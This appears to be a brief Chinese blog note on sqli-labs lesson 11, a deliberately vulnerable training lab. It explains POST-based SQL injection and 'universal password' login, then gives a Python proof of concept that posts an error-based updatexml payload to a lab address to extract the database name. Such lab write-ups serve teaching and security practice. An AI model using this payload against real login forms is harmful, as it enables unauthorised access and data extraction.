lesson11

lesson11相比之前的区别是从get方式的注入,更换成为Post方式的注入,事实上只要是post的注入就会存在万能密码。

之前已有描述,这次,可通过万能密码直接登陆

以下为POC

 1 import requests
 2 import re
 3 pattern1=re.compile(".*?XPATH syntax error: '|(.*?)'.*?",re.S)
 4 def attack():
 5     url="http://169.254.253.94/sqli/Less-11/"
 6     headers = {"Content-Type": "application/x-www-form-urlencoded",'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0'}
 7     payload="a' and updatexml(1,concat(0x7c,(select database())),1) -- and '1'='1"
 8     datas="uname="+payload+"&passwd=a&submit=submit"
 9     r=requests.post(url,data=datas,headers=headers)
10     content=r.text
11     #return content
12     m=re.match(pattern1,content)
13     if m:
14         return m.group(1)
15 print(attack())
16 
17     
原文地址:https://www.cnblogs.com/clearlove/p/6047946.html